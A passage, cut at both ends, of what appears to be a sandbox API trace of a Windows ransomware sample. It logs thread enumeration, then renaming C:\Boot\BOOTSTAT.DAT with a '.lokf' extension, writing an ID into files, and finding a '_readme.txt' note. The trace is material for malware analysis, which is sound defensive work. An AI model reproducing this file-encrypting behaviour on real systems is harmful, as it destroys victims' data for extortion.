lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.021] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.021] GetTickCount () returned 0x11db375 [0058.021] GetCurrentThreadId () returned 0x9e0 [0058.021] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.021] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.021] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.022] GetTickCount () returned 0x11db375 [0058.022] GetCurrentThreadId () returned 0x9e0 [0058.022] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.022] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.022] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.023] GetTickCount () returned 0x11db384 [0058.023] GetCurrentThreadId () returned 0x9e0 [0058.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.023] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.023] GetTickCount () returned 0x11db384 [0058.023] GetCurrentThreadId () returned 0x9e0 [0058.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.023] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.024] GetTickCount () returned 0x11db384 [0058.024] GetCurrentThreadId () returned 0x9e0 [0058.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.024] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.025] GetTickCount () returned 0x11db384 [0058.025] GetCurrentThreadId () returned 0x9e0 [0058.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.025] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.025] GetTickCount () returned 0x11db384 [0058.025] GetCurrentThreadId () returned 0x9e0 [0058.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.025] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.026] GetTickCount () returned 0x11db384 [0058.026] GetCurrentThreadId () returned 0x9e0 [0058.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.026] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.027] GetTickCount () returned 0x11db384 [0058.027] GetCurrentThreadId () returned 0x9e0 [0058.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.027] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.027] GetTickCount () returned 0x11db384 [0058.027] GetCurrentThreadId () returned 0x9e0 [0058.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.027] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.028] GetTickCount () returned 0x11db384 [0058.028] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.029] GetTickCount () returned 0x11db384 [0058.029] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.029] GetTickCount () returned 0x11db384 [0058.029] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.030] GetTickCount () returned 0x11db384 [0058.030] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.030] GetTickCount () returned 0x11db384 [0058.030] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.031] GetTickCount () returned 0x11db384 [0058.031] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.032] GetTickCount () returned 0x11db384 [0058.032] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.032] GetTickCount () returned 0x11db384 [0058.032] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.033] GetTickCount () returned 0x11db384 [0058.033] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.034] GetTickCount () returned 0x11db384 [0058.034] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.034] GetTickCount () returned 0x11db384 [0058.034] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.035] GetTickCount () returned 0x11db384 [0058.035] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.035] GetTickCount () returned 0x11db384 [0058.035] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.036] GetTickCount () returned 0x11db384 [0058.036] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.036] GetTickCount () returned 0x11db384 [0058.037] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.037] GetTickCount () returned 0x11db384 [0058.037] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.038] GetTickCount () returned 0x11db384 [0058.038] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.039] GetTickCount () returned 0x11db394 [0058.039] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.039] GetTickCount () returned 0x11db394 [0058.039] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.040] GetTickCount () returned 0x11db394 [0058.040] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.040] GetTickCount () returned 0x11db394 [0058.040] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.041] GetTickCount () returned 0x11db394 [0058.041] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.042] GetTickCount () returned 0x11db394 [0058.042] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.042] GetTickCount () returned 0x11db394 [0058.042] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.043] GetTickCount () returned 0x11db394 [0058.043] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.043] GetTickCount () returned 0x11db394 [0058.043] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.044] GetTickCount () returned 0x11db394 [0058.044] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.044] GetTickCount () returned 0x11db394 [0058.044] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.045] GetTickCount () returned 0x11db394 [0058.045] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.046] GetTickCount () returned 0x11db394 [0058.046] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.046] GetTickCount () returned 0x11db394 [0058.046] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.047] GetTickCount () returned 0x11db394 [0058.047] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.047] GetTickCount () returned 0x11db394 [0058.047] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.048] GetTickCount () returned 0x11db394 [0058.048] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.049] GetTickCount () returned 0x11db394 [0058.049] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.049] GetTickCount () returned 0x11db394 [0058.049] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.050] GetTickCount () returned 0x11db394 [0058.050] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.050] GetTickCount () returned 0x11db394 [0058.050] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.051] GetTickCount () returned 0x11db394 [0058.051] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.051] GetTickCount () returned 0x11db394 [0058.051] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.052] GetTickCount () returned 0x11db394 [0058.052] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.053] GetTickCount () returned 0x11db394 [0058.053] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.053] GetTickCount () returned 0x11db394 [0058.053] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.054] GetTickCount () returned 0x11db3a3 [0058.054] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.054] GetTickCount () returned 0x11db3a3 [0058.054] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.055] GetTickCount () returned 0x11db3a3 [0058.055] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.056] GetTickCount () returned 0x11db3a3 [0058.056] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.056] GetTickCount () returned 0x11db3a3 [0058.056] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.057] GetTickCount () returned 0x11db3a3 [0058.057] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.057] GetTickCount () returned 0x11db3a3 [0058.057] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.058] GetTickCount () returned 0x11db3a3 [0058.058] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.058] GetTickCount () returned 0x11db3a3 [0058.058] Thread32Next (hSnapshot=0x6f4, lpte=0x9f4f434) returned 1 [0058.059] GetTickCount () returned 0x11db3a3 [0058.112] FreeLibrary (hLibModule=0x76c20000) returned 1 [0058.112] QueryPerformanceCounter (in: lpPerformanceCount=0x9f4efa4 | out: lpPerformanceCount=0x9f4efa4*=78327563882) returned 1 [0058.112] GlobalMemoryStatus (in: lpBuffer=0x9f4f414 | out: lpBuffer=0x9f4f414) [0058.114] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.114] WriteFile (in: hFile=0x5cc, lpBuffer=0x3234418*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3234418*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.114] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.114] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.114] CloseHandle (hObject=0x5cc) returned 1 [0058.116] MoveFileW (lpExistingFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\Boot\\BOOTSTAT.DAT.lokf" (normalized: "c:\\boot\\bootstat.dat.lokf")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea61310, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea61310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ea87470, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea87470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0058.117] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0058.118] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0058.118] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec9c7b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec9c7b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0058.118] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ecc2910, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ecc2910, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0058.119] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea15050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.119] PathFindExtensionW (pszPath="C:\\Boot\\_readme.txt") returned=".txt" [0058.119] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ea15050, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ea15050, 